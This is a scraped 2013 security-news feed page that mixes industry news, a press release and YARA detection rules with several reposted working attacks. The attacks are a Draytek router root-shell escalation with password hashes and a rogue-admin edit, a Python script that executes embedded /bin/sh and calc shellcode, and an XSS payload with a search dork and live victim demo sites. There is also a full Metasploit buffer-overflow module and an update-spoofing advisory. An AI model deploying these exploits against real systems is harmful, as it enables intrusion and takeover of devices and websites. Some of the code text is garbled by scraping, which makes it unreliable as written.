Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

How to probe ip_forward option on remote hosts?

March 29, 2013, 6:01 am
$
0
0

On a local network, I thought about a way to know if a remote host acts as a gateway or not. In other words, it remotely probes the "/proc/sys/net/ip_forward" file content (used to enable or disable IP forwarding). It can be useful if you join an unfamiliar network and wish to find out what is the default gateway.

The trick is done by sending an ICMP_ECHOREQUEST packet to an arbitrary host, and by forging the destination MAC address of the MAC header with the MAC address of the remote target. Thus, the packet will be first handled by the target.

read more.........http://vladz.devzero.fr/007_isgate.php
Search

IBM X-Force 2012 Annual Trend & Risk report has released!

March 29, 2013, 6:03 am
$
0
0

It is always exciting to be able to announce the next version of the IBM X-Force® Trend & Risk report and today we are announcing the full year 2012 findings of key highlights that were researched by IBM X-Force.

One of the differentiators that we observed across various attacker efforts was that by targeting vulnerabilities in cross-platform frameworks, and building on a solid foundation of tried-and-true attack techniques, attackers are achieving a greater return on exploit development in 2012.

Looking back over the year, there was a measurable increase in the public announcements of security incidents and breaches, where SQL injection and DDoS attacks continued to wreak havoc on IT infrastructures.

Over the past year the discovery of sophisticated toolkits with ominous names like Flame to cross-platform zero-day vulnerabilities, had both consumers and corporations inundated with advisories and alerts regarding emerging threats. The frequency of data breaches and incidents—which had already hit a new high in2011—continued their upward trajectory.


read more.......http://blogs.iss.net/archive/2012-XFTR-EOY.html

Draytek Vigor 3900 1.06 - Privilege Escalation

March 29, 2013, 6:04 am
$
0
0

# Exploit Title: Previlege escalation
# Date: 19/3/2013
# Exploit Author: Mohammad abou hayt
# Vendor Homepage: http://www.draytek.com.tw/index.php?option=com_k2&view=item&layout=item&id=2627&Itemid=593&lang=en
# Software Link: N/A
# Version: Vigor 3900 -Hardware V2 - firmware latest 1.06

########################Privilege escalation  for draytek vigor 3900#####################

########################Affected device Description:#####################################
Vigor 3900 Router Firewall :
High Performance Multi-WAN VPN Appliance
The Vigor 3900 is a high-performance quad-Gigabit WAN router for high-performance applications including remote access, firewalling, load-balancing and
failover. Its WAN throughput runs at up to 1Gb/s, adequate for the most demanding SME applications. The WAN ports on the Vigor 3900 can provide load balancing
or WAN failover. Based on a new DrayTek OS platform, the Vigor 3900 combines high performance and capacity with DrayTek's traditional ease of use and comprehensive
features set.
########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management
providing access to WAN resources only to the appropriate users or departments, as well as maintaining infrastructure effciency.

############################Advisory:###################################################

#The finding started when creating a normal limited user or any user to access the firewall dashboard.


##Having the port 22 open by default, try to login the firewall using putty with this limited user credentials

login as: test
test@192.168.0.1 password:

********************************************
*                                          *
*                Welcome V3900             *
*                                          *
********************************************

Welcome it is Thu Mar 28 18:58:31 UTC 2013
Vigor3900>



###vigor 3900 is built in BusyBox  : Trying to shell the device by using “sh draytekv3900” will gain root shell without asking for credintial   .
####And what I have noticed that any user you create from the dashboard will be able to access the root shell whereas .

Vigor3900> sh draytekv3900


BusyBox v1.4.2 (2013-02-25 23:52:19 CST) Built-in shell (ash)
Enter 'help' for a list of built-in commands.


#####Printing the cat /etc/passwd

~ # cat /etc/passwd
root:!:0:0:root:/tmp:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
admin:$1$1xUkNSXm$SFvMVQCzcM3LmK9mrJmux0:500:500:admin:/tmp:/usr/bin/clish
operator:$1$.FTn64sr$3tKZ2599RrSU9TA.C/vKd0:501:501:operator:/usr:/bin/clish
quagga:x:51:51:quagga:/tmp/.quagga:/bin/false
test:$1$qHVw8Ap.BnYm7jd5VYqBSo0:502:502:Linux User,,,:/tmp:/usr/bin/clish



#######Adding another admin (admin1)

~ # vi /etc/passwd
root:!:0:0:root:/tmp:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
admin:$1$1xUkNSXm$SFvMVQCzcM3LmK9mrJmux0:500:500:admin:/tmp:/usr/bin/clish
operator:$1$.FTn64sr$3tKZ2599RrSU9TA.C/vKd0:501:501:operator:/usr:/bin/clish
quagga:x:51:51:quagga:/tmp/.quagga:/bin/false
admin1:$1$1xUkNSXm$SFvMVQCzcM3LmK9mrJmux0:500:500:admin:/tmp:/usr/bin/clish
test:$1$qHVw8Ap.BnYm7jd5VYqBSo0:502:502:Linux User,,,:/tmp:/usr/bin/clish

~:wq

____________________________________________________________


Discovered and written by: Mohammad Abou Hayt

__________________________________________________




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information



How you can abuse the Python VM to execute x86 codes for fun

March 29, 2013, 6:07 am
$
0
0

Source link: https://github.com/0vercl0k/stuffz/blob/master/abuse_python27_vm_to_execute_x86_code.py
stuffz / abuse_python27_vm_to_execute_x86_code.py 
   
Remove an int3 used for debugging purpose
1 contributor
 file 129 lines (106 sloc) 5.189 kb
EditRawBlameHistory
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128

#!/usr/bin/env python


# -*- coding: utf-8 -*-




#


#    abuse_python27_vm_to_execute_x86_code.py - Python 2.7 opcodes & x86 shellcodes = funz


#    Copyright (C) 2013 Axel "0vercl0k" Souchet - http://www.twitter.com/0vercl0k


#


#    This program is free software: you can redistribute it and/or modify


#    it under the terms of the GNU General Public License as published by


#    the Free Software Foundation, either version 3 of the License, or


#    (at your option) any later version.


#


#    This program is distributed in the hope that it will be useful,


#    but WITHOUT ANY WARRANTY; without even the implied warranty of


#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the


#    GNU General Public License for more details.


#


#    You should have received a copy of the GNU General Public License


#    along with this program.  If not, see <http://www.gnu.org/licenses/>.


#




# https://twitter.com/elvanderb/status/162551396015669248 -- Challenge accepted mate!




importstruct


importtypes


importopcode


importplatform


importsys




defpack_ushort(us):


    returnstruct.pack('<H',us)




defpack_uint(ui):


    returnstruct.pack('<I',ui)




defget_opcode(o):


    returnchr(opcode.opmap[o])




defexec_x86_shellcodes_via_python27_opcodes_(addr_x86_code):


    """Execute native x86 code abusing the Python VM"""




    defpull_the_trigger_b1tch():


        """Pull the trigger motherfucker"""


        pass




    const_tuple=()


    addr_const_tuple=id(const_tuple)




    first_indirection='A'*0x40+pack_uint(addr_x86_code)


    addr_first_indirection=id(first_indirection)


    addr_first_indirection_controled_data=addr_first_indirection+0x14




    fake_object='AAAA'+pack_uint(addr_first_indirection_controled_data)


    addr_fake_object=id(fake_object)


    addr_fake_object_controled=addr_fake_object+0x14




    # In LOAD_CONST:


    # CPU Disasm


    # Address   Hex dump          Command                                  Comments


    # 1E011389    8B4C24 7C       MOV ECX,DWORD PTR [ESP+7C]


    # 1E01138D    8B7C99 0C       MOV EDI,DWORD PTR [EBX*4+ECX+0C] # EDI will be the 0xdeadbeef


    # 1E011391    8B4424 0C       MOV EAX,DWORD PTR [ESP+0C]


    # 1E011395    FF07            INC DWORD PTR [EDI]


    # 1E011397    8938            MOV DWORD PTR [EAX],EDI




    ptr_object=pack_uint(addr_fake_object_controled)


    addr_ptr_object=id(ptr_object)


    addr_ptr_data_controled=addr_ptr_object+0x14




    # Compute the offset


    # Remember:


    # 1E01138D    8B7C99 0C       MOV EDI,DWORD PTR [EBX*4+ECX+0C] ; ECX is the address of the const_tuple object, EBX you control!


    assert((addr_ptr_data_controled-addr_const_tuple-0xC)%4==0)




    offset=((addr_ptr_data_controled-addr_const_tuple-0xC)&0xffffffff)/4


    offset_high,offset_low=offset>>16,offset&0xffff




    # 1. Load the low part of our address


    evil_bytecode=get_opcode('EXTENDED_ARG')+pack_ushort(offset_high)


    # 2. Load an object from the const: This is an evil object :]


    evil_bytecode+=get_opcode('LOAD_CONST')+pack_ushort(offset_low)


    # 3. Call the function on the top of stack: The evil function object :]


    evil_bytecode+=get_opcode('CALL_FUNCTION')+'\x00\x00'




    pull_the_trigger_b1tch.func_code=types.CodeType(


        0,


        0,


        0,


        0,


        evil_bytecode,


        const_tuple,


        (),


        (),


        "",


        "",


        0,


        ""


    )




    # and b00m!1§1§1§


    pull_the_trigger_b1tch()




defmain(argc,argv):


    sh=None


    system=platform.system()




    ifsystem=='Windows':


        # Windows/x86 - calc.exe shellcode


        sh='\xda\xc3\xba\x2d\xae\x01\x6b\xd9\x74\x24\xf4\x5d\x31\xc9\xb1\x33\x83\xed\xfc\x31\x55\x13\x03\x78\xbd\xe3\x9e\x7e\x29\x6a\x60\x7e\xaa\x0d\xe8\x9b\x9b\x1f\x8e\xe8\x8e\xaf\xc4\xbc\x22\x5b\x88\x54\xb0\x29\x05\x5b\x71\x87\x73\x52\x82\x29\xbc\x38\x40\x2b\x40\x42\x95\x8b\x79\x8d\xe8\xca\xbe\xf3\x03\x9e\x17\x78\xb1\x0f\x13\x3c\x0a\x31\xf3\x4b\x32\x49\x76\x8b\xc7\xe3\x79\xdb\x78\x7f\x31\xc3\xf3\x27\xe2\xf2\xd0\x3b\xde\xbd\x5d\x8f\x94\x3c\xb4\xc1\x55\x0f\xf8\x8e\x6b\xa0\xf5\xcf\xac\x06\xe6\xa5\xc6\x75\x9b\xbd\x1c\x04\x47\x4b\x81\xae\x0c\xeb\x61\x4f\xc0\x6a\xe1\x43\xad\xf9\xad\x47\x30\x2d\xc6\x73\xb9\xd0\x09\xf2\xf9\xf6\x8d\x5f\x59\x96\x94\x05\x0c\xa7\xc7\xe1\xf1\x0d\x83\x03\xe5\x34\xce\x49\xf8\xb5\x74\x34\xfa\xc5\x76\x16\x93\xf4\xfd\xf9\xe4\x08\xd4\xbe\x1b\x43\x75\x96\xb3\x0a\xef\xab\xd9\xac\xc5\xef\xe7\x2e\xec\x8f\x13\x2e\x85\x8a\x58\xe8\x75\xe6\xf1\x9d\x79\x55\xf1\xb7\x19\x38\x61\x5b\xf0\xdf\x01\xfe\x0c'


    elifsystem=='Linux':


        # Linux/x86 - execve /bin/sh - 21 bytes


        sh='\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'


    else:


        sh='\xcc'




    # The string of a PyStringObject is stored at the offset 0x14


    # typedef struct


    # {


    #     PyObject_VAR_HEAD


    #     long ob_shash;


    #     int ob_sstate;


    #     char ob_sval[1]; // <- OUR STR1NGZ


    # } PyStringObject;


    address_shellcode=id(sh)+0x14


    exec_x86_shellcodes_via_python27_opcodes_(address_shellcode)




if__name__=='__main__':


    sys.exit(main(len(sys.argv),sys.argv))

Voila CMS Cross Site Scripting

March 29, 2013, 6:09 am
$
0
0

#####################
#Exploit Title:Voila Cms Xss Vulnerability.
#Exploit Author:Darksnipper & Dr.v!ru$
#Home:www.cybercoders.org
#Email:Darksnipper@live.com
#Cms Link:http://www.voilasyria.com
#Tested On : windows 7 & linux.
#Dork:intext:powerd by voila
#P.o.c
open
http://site.com/path/view/search/viewSearch.php
put in search bar
<script>alert("xss by Darksnipper")</script>

Boom Done Its Vulnerable to xss

Demo:
http://voitest.com/ithad/view/search/viewSearch.php
put in Search box
<script>alert("xss by Darksnipper")</script>
example No 2
http://www.arabengineeringindustries.org/view/search/viewSearch.php
Same put this in search box nd click the side button:
<script>alert("xss by Darksnipper")</script>

#Greetz:Dream.killer,Soul~Inj3ct0r,Error
Haxor,1337,H4xorl1f3,shadow008,x3o-1337,SOG,Dr.z0mbie,P4k-command3r,Over-x,Zhc
Snipper,Asif Iqbal,Junaid Hussain,Madc0de Haxor,Code Smasher,Z company
Hacking Crew, Kashmiri Hackers,Madleets Team,PakHack Team,3xp1r3 Cyber
Army & All Freedom Fighters.
#####################




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Metasploit; ALLMediaServer 0.94 Buffer Overflow

March 29, 2013, 6:11 am
$
0
0

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
  #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'    => 'ALLMediaServer 0.94 Buffer Overflow Exploit',
      'Description'  => %q{
          This module exploits a stack buffer overflow in ALLMediaServer 0.94. The vulnerability
                    is caused due to a boundary error within the handling of HTTP request.
      },
      'License'    => MSF_LICENSE,
      'Author'    =>
        [
          'metacom<metacom27[at]gmail.com>',  # Original discovery
          '<metacom>',  # MSF Module
                                         'RST',
        ],
      'References'  =>
        [
          [ 'OSVDB', '<insert OSVDB number here>' ],
          [ 'CVE', 'insert CVE number here' ],
          [ 'URL', 'http://www.bugsearch.net/en/14147/allmediaserver-094-seh-overflow-exploit.html' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process', #none/process/thread/seh
          #'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'  => 'win',
      'Payload'  =>
        {
          'BadChars' => "\x00", # <change if needed>
          'DisableNops' => true,
        },

      'Targets'    =>
        [
          [ 'Windows 7',# Tested on: Windows 7 SP1/SP0
            {
              'Ret'     =>  0x65EC24CA, # pop eax # pop ebx # ret  - avcodec-53.dll
              'Offset'  =>  1065
            }
          ],
        ],
      'Privileged'  => false,
      #Correct Date Format: "M D Y"
      #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
      'DisclosureDate'  => 'Mar 28 2013',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(888)], self.class)

  end

  def exploit


    connect
        buffer = "http://"
    buffer << rand_text(target['Offset'])  #junk
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded  #3931 bytes of space
    # more junk may be needed to trigger the exception

    print_status("Sending payload to ALLMediaServer on #{target.name}...")
    sock.put(buffer)

    handler
    disconnect

  end
end



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

LDRA Extends Integration with MATLAB and Simulink, Verifying the Model at Object Code Level

March 29, 2013, 7:05 am
$
0
0

To boost the quality and efficiency of safety-critical design, the LDRA tool suite now analyzes, instruments and assesses code coverage of both source and object code during the model phase of development
DESIGN West 2013
WIRRAL, England--(BUSINESS WIRE)--LDRA, the leader in standards compliance, automated software verification, source code analysis and test tools, now offers unprecedented verification of the model through a sophisticated integration with MATLAB and Simulink. The LDRA tool suite can now use real-world data from MATLAB that’s connected to a Simulink model in order to fully verify the application at a source and object code level. Developers can fine-tune the model to reflect a data-driven flow of information, reducing the amount of error-prone manual manipulation necessary for the model-generated code to achieve DO-178C, Level A certification.
“The integration of MATLAB and Simulink with the LDRA tool suite enables developers to reuse their requirements-based model simulation test framework now on the executable object code. This improves the efficiency and quality of code while continuing to meet the highest criteria of industry certification.”
The most critical levels of certification require comprehensive testing of an application by independent analysis not only at the source code level, but also at the machine code assembler level. While model-driven development typically ensures consistent code, verification previously required many more steps. Developers could verify the model, but to ensure the model-generated code properly managed a real-world situation, the code had to be extracted, instrumented, connected to an execution harness, and executed against functional verification data. Discrepancies in the functionality required developers to rework the model and manually manipulate the code. Not until the developer could prove that every line of code had been fully tested could an application be submitted for Level A certification.
LDRA Proves Functionality at the Model Level
Thanks to the integration with MATLAB and Simulink, customers can run real-world code generated by Embedded Coder in software in the loop (SIL) and processor in the loop (PIL) simulations. The LDRA tool suite will then analyze both the source and object codes entirely inside the same LDRA framework. LDRA acts as an independent verification layer, working within the MATLAB and Simulink environment. By applying data from models, developers can better understand how various components of the application interact with each other. Defects in the design can be identified, and changes made to the model directly, eliminating many hours of error-prone iterations between the model, code and data.
“Because Model-Based Design generates code automatically and saves development time, we continue to look for ways to test the code automatically and save verification time,” stated Tom Erkkinen, Embedded Applications Manager, MathWorks. “The integration of MATLAB and Simulink with the LDRA tool suite enables developers to reuse their requirements-based model simulation test framework now on the executable object code. This improves the efficiency and quality of code while continuing to meet the highest criteria of industry certification.”
“Rigorous verification of the safety-critical systems found in avionics, defense and high-speed rail have resulted in stellar safety records, but at a significant financial and time-to-market cost,” noted Ian Hennell, LDRA Operations Director. “Through this integration, LDRA gives companies a way to maintain best-of-breed software practices and quality while better managing the work flow, schedule and cost of development.”
Graphical Debug and Process Automation Speed Development
The integration enables the LDRA tool suite to perform verification to the object code level through Simulink-based testing. The LDRA tool suite can then verify that any discrepancies between source and object code caused by compiler or program optimization are corrected in the model. Because the developers are working in the model, the relationships between application components and data elements are transparent. In addition, direct integration of object code coverage enables developers to perform DO-178C object code verification early in the development process.
Such automation and elimination of manual steps enables companies to achieve the most rigorous certification levels from their Simulink models. Developers can prove that their applications have been fully tested down to the object code level, fulfilling the demands of DO-178C, Level A. By beginning the certification process for Level A projects early in the design lifecycle, any issues with compilers generating invalid or extraneous object code are identified and addressed early. Without this capability, discovery of object code verification errors occur late in the design lifecycle and can result in late stage delays in product release.
While such testing does not obviate the need to test the application in an integrated environment, it does ensure that most, if not all, application defects are identified and corrected prior to this stage. Given the cost and the limited availability of hardware components, the integration of the LDRA tool suite with Simulink and MATLAB ensures that the application can evolve to an advanced level of code maturity and quality before being exercised on the target system. This level of control shortcuts project overruns in both time and cost.
A demonstration of the LDRA and MathWorks integration will be presented at Booth 2138 at Design West 2013 from April 23 to 25 in San Jose, California.
About LDRA
For more than forty years, LDRA has developed and driven the market for software that automates code analysis and software testing for safety-, mission-, security- and business-critical markets. Working with clients to achieve early error identification and full compliance with industry standards, LDRA traces requirements through static and dynamic analysis to unit testing and verification for a wide variety of hardware and software platforms. Boasting a worldwide presence, LDRA is headquartered in the UK with subsidiaries in the United States, India and an extensive distributor network. For more information on the LDRA tool suite, please visit www.ldra.com.
Please send reader enquiries to:
Mark James
Email: mark.james@ldra.com
MATLAB and Simulink are registered trademarks of The MathWorks, Inc. See www.mathworks.com/trademarks for a list of additional trademarks. Other product or brand names may be trademarks or registered trademarks of their respective holders.
Word copy of release
You can tweet or share the release directly from the LDRA Systems Press Center on HughesCom’s website. Translated versions of the release and background materials are also available for download.
This press release and associated images (in high-resolution compressed jpeg format) can be downloaded from www.hughescom.net.

Contacts

Media:
Hughes Communications, Inc.
Janice Hughes, 705-549-8952 or 705-774-8686 (Mobile)
Media Relations
janice@hughescom.net
or
LDRA
Mark James, +44 (0)151 649 9300
Marketing Manager
mark.james@ldra.com

YARA 1.7 release- tool aimed at helping malware researchers to identify and classify malware samples

March 29, 2013, 7:09 am
$
0
0

YARA in a nutshell

YARA is a tool aimed at helping malware researchers to identify and classify malware samples. With YARA you can create descriptions of malware families based on textual or binary patterns contained on samples of those families. Each description consists of a set of strings and a Boolean expression which determines its logic. Let's see an example:
rule silent_banker : banker{
    meta:                                       
        description ="This is just an example"
        thread_level =3
        in_the_wild =true

    strings:
        $a ={6A4068003000006A148D91} 
        $b ={8D4D B0 2B C1 83 C0 27996A4E59 F7 F9}
        $c ="UVODFRYSIHLNWPEJXQZAKCBGMT"

    condition:
        $a or $b or $c}
The rule above is telling YARA that any file containing one of the three strings must be reported as silent_banker.
This is just a simple example, more complex and powerful rules can be created by using binary strings with wild-cards, case-insensitive text strings, special operators, regular expressions and many other features that you can find explained in YARA's documentation.
YARA is multi-platform, running on Windows, Linux and Mac OS X, and can be used through its command-line interface or from your own Python scripts with the yara-python extension.
Python users can also use yara-ctypes by Michael Dorman. He has also written a multi-threaded command-line YARA scanner based on yara-ctypes that can exploit the benefits of current multi-core CPUs when scanning big file collections.
If you are a Ruby user you can use yara-ruby, written by Eric Monti.

More examples

The following are real-life examples of how to use YARA rules to identify malware families.
rule zbot : banker{
     strings:
        $a ="__SYSTEM__" wide
        $b ="*tanentry*"
        $c ="*<option"
        $d ="*<select"
        $e ="*<input"

     condition:
        ($a and $b)or($c and $d and $e)
}

rule banbra : banker{
    strings:
        $a ="senha" fullword nocase
        $b ="cartao" fullword nocase
        $c ="caixa"
        $d ="login" fullword nocase
        $e =".com.br"

     condition:
        #a > 3 and #b > 3 and #c > 3 and #d > 3 and #e > 3              
}

Who's using YARA

Change log

version 1.0 (24/09/2008)
  • first release
version 1.1 (05/01/2009)
  • added support for strings containing null (\x00) chars
  • added syntactic construct "x of them"
  • regular expressions syntax changed
  • now regular expressions can begin with any character
version 1.2 (13/01/2009)
  • added support for global rules
  • added support for declaring alternative sub-strings in hex strings
  • added support for anonymous strings
  • added support for intXX and uintXX functions
  • operator "of" was enhanced
  • implemented new operator "for..of"
  • "widechar" is now "wide" and can be used in conjuntion with "ascii"
  • improved syntax error reporting in yara-python
  • "compile" method in yara-python was enhanced
  • "matchfile" method in yara-python was substituted by "match"
  • some performance improvements
  • BUGFIX: Wrong behavior of escaped characters in regular expressions
  • BUGFIX: Fatal error in yara-python when invoking matchfile with invalid path twice
  • BUGFIX: Wrong precedence of OR and AND operators
  • BUGFIX: Access violation when scanning MZ files with e_lfanew == -1
  • BUGFIX: Incorrect handling of hex strings in lexer
version 1.2.1 (14/04/2009)
  • libyara: added support for compiling rules directly from memory
  • libyara: interface refactored
  • libyara: is thread-safe now
  • BUGFIX: Invoking pcre_compile with non-terminated string
  • BUGFIX: Underscore not recognized in string identifiers
  • BUGFIX: Memory leak
  • BUGFIX: Access violation on xxcompare functions
version 1.3 (26/10/2009)
  • added a C-like "include" directive
  • added support for multi-sources compilation in yara-python
  • added support for metadata declaration in rules
  • BUGFIX: Incorrect handling of single-line comments at the end of the file
  • BUGFIX: Integer underflow when scanning files of size <= 2 bytes
version 1.4 (13/05/2010)
  • added external variables
  • scan speed improvements
  • added fast scan mode
  • BUGFIX: crash in 64-bits Windows
version 1.5 (22/03/2011)
  • added -l parameter to abort scanning after a number of matches
  • added support for scanning processes memory
  • entrypoint now works with ELF as well as PE files
  • added support for linking with the faster RE2 library (http://code.google.com/p/re2/) instead of PCRE
  • implemented index operator to access offsets where string was found
  • implemented new operator "for < quantifier > < variable > in < set or range > : (< expression >) "
  • BUGFIX: Memory leaks in yara-python
  • BUGFIX: yara.compile namespaces not working with filesources
version 1.6 (04/08/2011)
  • added support for bitwise operators
  • added support for multi-line hex strings
  • scan speed improvement for regular expressions (with PCRE)
  • yara-python ported to Python 3.x
  • yara-python support for 64-bits Python under Windows
  • BUGFIX: Buffer overflow in error printing
version 1.7 (29/03/2013)
  • faster compilation
  • added suport for modulus (%) and bitwise xor (|) operators
  • better hashing of regular expressions
  • BUGFIX: yara-python segfault when using dir() on Rules and Match classes
  • BUGFIX: Integer overflow causing infinite loop
  • BUGFIX: Handling strings containing \x00 characters correctly
  • BUGFIX: Regular expressions not matching at the end of the file when compiled with RE2
  • BUGFIX: Memory leaks
  • BUGFIX: File handle leaks
Search

US-CERT Current Activity - Google Releases Google Chrome 26.0.1410.43

March 29, 2013, 7:46 am
$
0
0
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

National Cyber Awareness System
Google Releases Google Chrome 26.0.1410.43


Original release date: March 29, 2013

Google has released Google Chrome 26.0.1410.43 for Windows, Mac, Linux,
and Chrome Frame to address multiple vulnerabilities. These
vulnerabilities could allow a remote attacker to cause a denial of
service or execute arbitrary code.

US-CERT encourages users and administrators to review the Google Chrome
Release blog entry and update to Chrome 26.0.1410.43.

Relevant URL(s):
<http://googlechromereleases.blogspot.com/search/label/Stable%20updates>

____________________________________________________________________

   Produced by US-CERT, a government organization.
____________________________________________________________________

This product is provided subject to this Notification:
http://www.us-cert.gov/privacy/notification/

Privacy & Use policy:
http://www.us-cert.gov/privacy/

This document can also be found at
http://www.us-cert.gov/ncas/current-activity/2013/03/29/Google-Releases-Google-Chrome-260141043


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iQEVAwUBUVWcondnhE8Qi3ZhAQI/0gf+LKk3GHKqL91XH2sSfGZjvGDLk+rD3zAv
MYXDGi4L8xaOlnJTMA/8lzaFqBjHxSEIUAkawKoPfZcilurtn/mwFDHvxTNCuaZX
hKstX5RW64jUvnbE3pcG8xA/hzbn4orPpic0yc2n+tAzJCc6EOrODYZGNZkZlNRZ
bYUgI8BqD7JXHXw3pYpA7NE6TjuY9N6/xbLyGy+wl+XG2Lj2F/uetMyIdrcLRenn
ma9EeNC/fYiaDiIybo5sI41MeUtDKxzuYA5fGYy4M93L+vtn/JpIfI6nLi+VY5GG
VcSk+V/xGfe8I+Ib1en6lYDd8kkILnAb1hNC6UY6vV8Mdrcebh3NRw==
=Wldc
-----END PGP SIGNATURE-----

EMEA Security Appliance Market Shows Strongest Results Yet in 4Q12

March 29, 2013, 7:48 am
$
0
0
According to the latest EMEA Quarterly Security Appliance Tracker from International Data Corporation (IDC), 4Q12 factory revenue for the market reached $696.8 million, a 5.2% increase over the same quarter a year ago. Shipments increased 5.2% year on year, with 200,089 units shipped. For the full year 2012, security appliance market factory revenue was about $2.5 billion, a 2% increase over 2011.

read more.......http://www.eurosecglobal.de/emea-security-appliance-market-shows-strongest-results-yet-in-4q12-says-idc.html

[waraxe-2013-SA#100] - Update Spoofing Vulnerability in mRemote 1.50

March 29, 2013, 7:50 am
$
0
0 

[waraxe-2013-SA#100] - Update Spoofing Vulnerability in mRemote 1.50
===============================================================================

Author: Janek Vind "waraxe"
Date: 29. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-100.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mRemote is a software solution that will allow you to manage all your remote
control connections in a single place. Currently it supports the RDP, VNC,
SSH2 and Telnet protocols.

http://www.royalts.com/main/home/mRemote.aspx
http://mremote-portable.softpile.com/58492/download/

Vulnerable is version 1.50, other versions not tested.


###############################################################################
1. Update Spoofing Vulnerability
###############################################################################

Current version of mRemote contains security vulnerability in update mechanism,
which can be exploited by malicious people to conduct spoofing attacks.

When checking for updates, mRemote issues GET request over HTTP:


GET /mRemote_Update.txt HTTP/1.1
Host: update.mremote.org
Connection: Keep-Alive


Server response:

HTTP/1.1 200 OK
Content-Length: 284
Content-Type: text/plain
Last-Modified: Wed, 22 Apr 2009 18:29:48 GMT
Accept-Ranges: bytes
ETag: "16cc425178c3c91:1e75"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 28 Mar 2013 14:03:07 GMT

Version: 1.50
dURL: http://www.mremote.org/wiki/GetFile.aspx?File=Downloads/mRemote_1.50_Setup.exe
clURL: http://update.mRemote.org/mRemote_1.50_ChangeLog.txt
imgURL: http://update.mRemote.org/banners/Banner_vRD09.png
imgURLLink: http://www.visionapp.com/vRD2009-highlights.html


mRemote user can click "Download and Install" button and mRemote
will download and install the update.

Such update mechanism contains two security flaws:

1. Update check is done over unencrypted HTTP channel. Malicious third party
is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response.
In this way it is possible to instruct mRemote to download malicious update.

2. mRemote will execute downloaded update without digital signature
verification.

Testing: tests were done using Windows 7 and Apache webserver. Steps:

1. modify "windows/system32/drivers/etc/hosts" file in order to emulate
DNS spoofing:  127.0.0.1 update.mremote.org

2. create text file "mRemote_Update.txt" to the webserver main directory
with following content:

Version: 1.51
dURL: http://localhost/calc.exe
clURL: http://localhost/mRemote_1.51_ChangeLog.txt
imgURL: http://update.mRemote.org/banners/Banner_vRD09.png
imgURLLink: http://www.visionapp.com/vRD2009-highlights.html


3. create text file "mRemote_1.51_ChangeLog.txt" to the webserver main
directory with following content:

New version 1.51 available!


4. Place "calc_EN.exe" file to the webserver main directory.

5. Open mRemote, it will check for updates automatically.

Response: New version 1.51 available!

6. Press "Download and Install" button. Successful download ends with response:

Download complete! mRemote will now quit and begin with the installation.

7. Press "OK" button and downloaded exe file will be executed.



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe () yahoo com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------




//The information contained within this publication is





//supplied "as-is"with no warranties or guarantees of fitness





//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts





//responsibility for any damage caused by the use or misuse of





//this information

[waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1

March 29, 2013, 7:50 am
$
0
0 


[waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1.5
===============================================================================

Author: Janek Vind "waraxe"
Date: 29. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-101.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Royal TS is a simple, yet powerful tool for administrators, developers,
system engineers and many other IT focused information workers that supports
them in working effortless with their remote systems or management consoles.

http://www.royalts.com/main/home/win.aspx

